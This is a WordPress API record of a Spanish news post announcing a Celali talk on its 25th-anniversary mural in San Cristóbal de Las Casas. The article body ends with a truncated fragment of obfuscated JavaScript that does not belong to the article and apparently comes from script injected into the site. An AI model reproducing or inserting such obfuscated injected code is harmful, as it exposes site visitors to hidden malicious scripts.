{"id":4210,"date":"2022-08-08T03:45:16","date_gmt":"2022-08-08T03:45:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4210"},"modified":"2022-08-08T03:45:16","modified_gmt":"2022-08-08T03:45:16","slug":"realizara-celali-conversatorio-simbolismo-y-continuidades-en-las-practicas-ancestrales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4210","title":{"rendered":"Realizar\u00e1 Celali conversatorio \u201cSimbolismo y continuidades en las pr\u00e1cticas ancestrales\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0049-690x1024.jpg\" alt=\"\" class=\"wp-image-4211\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0049-690x1024.jpg 690w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0049-202x300.jpg 202w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220807-WA0049.jpg 720w\" sizes=\"auto, (max-width: 690px) 100vw, 690px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez&nbsp;<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- El Centro Estatal de Lenguas, Arte y Literatura Ind\u00edgenas (Celali) dio a conocer que realizar\u00e1n el conversatorio \u201cSimbolismo y continuidades en las pr\u00e1cticas ancestrales\u201d, cuya finalidad es seguir reflexionando el quehacer art\u00edstico de los creadores de los pueblos originarios de Chiapas.<\/p>\n\n\n\n<p>&nbsp;Al respecto, Nicol\u00e1s L\u00f3pez Arcos, Jefe de la Oficina de Artes del Celali dijo que en este conversatorio, se hablar\u00e1 del contenido del mural del XXV aniversario del CELALI, cuyos autores son pintores e investigadores de esta instituci\u00f3n cultural.<\/p>\n\n\n\n<p>&#8220;Se contar\u00e1 con la participaci\u00f3n de especialistas con una amplia visi\u00f3n en el arte y ellos son: Isabelle Sophia Pincemin Deliberos catedr\u00e1tica de la Facultad de Ciencias Sociales de la Universidad Aut\u00f3noma de Chiapas (UNACH), Roberto Culebro \u201cToshiro\u201d artista pl\u00e1stico, Jos\u00e9 Osbaldo Garc\u00eda Mu\u00f1oz y Nicol\u00e1s P\u00e9rez Ju\u00e1rez, autores del mural\u201d.<\/p>\n\n\n\n<p>\u201cEn este cuarto de siglo de trabajo, el Celali ha puesto \u00e9nfasis en los rubros de capacitaci\u00f3n, difusi\u00f3n e investigaci\u00f3n principalmente, y este resultado lo podemos apreciar en libros, revistas monoling\u00fces y biling\u00fces, adem\u00e1s de las obras pict\u00f3ricas, en este caso el mural\u201d, indic\u00f3 L\u00f3pez Arcos.<\/p>\n\n\n\n<p>\u201cComo parte integrante de la generaci\u00f3n fundadora del CELALI hemos aprendido a optimizar los recursos humanos y econ\u00f3micos para realizar acciones culturales y con un compromiso genuino con nuestra instituci\u00f3n cultural nos hemos adecuado a las nuevas realidades laborales en el interior de esta instituci\u00f3n, y por ello este mural se realiz\u00f3 combinando horario laboral, fines de semana y horas nocturnas; esto no hubiese sido posible sin el apoyo de los creadores, artistas, acad\u00e9micos, hacedores culturales de diferentes lenguas y culturas&#8221;, agreg\u00f3.<\/p>\n\n\n\n<p>En este evento, se proyectar\u00e1 adem\u00e1s un video en donde se narra y describe el proceso que se sigui\u00f3 para la elaboraci\u00f3n de dicha obra art\u00edstica y se llevar\u00e1 a cabo el d\u00eda 09 de agosto del 2022, a las 11:00 horas en las instalaciones de este casa cultural, es un evento abierto al p\u00fablico en general y es parte de la celebraci\u00f3n del &#8220;D\u00eda Internacional de los Pueblos Ind\u00edgenas&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez&nbsp; San Crist\u00f3bal de Las Casas.- El Centro Estatal de Lenguas, Arte y Literatura Ind\u00edgenas (Celali) dio a conocer que realizar\u00e1n el conversatorio \u201cSimbolismo y continuidades en las pr\u00e1cticas ancestrales\u201d, cuya finalidad es seguir reflexionando el quehacer art\u00edstico de los creadores de los pueblos originarios de Chiapas. &nbsp;Al respecto, Nicol\u00e1s L\u00f3pez Arcos, Jefe de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4211,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4210","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4210"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4210\/revisions"}],"predecessor-version":[{"id":4212,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4210\/revisions\/4212"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4211"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}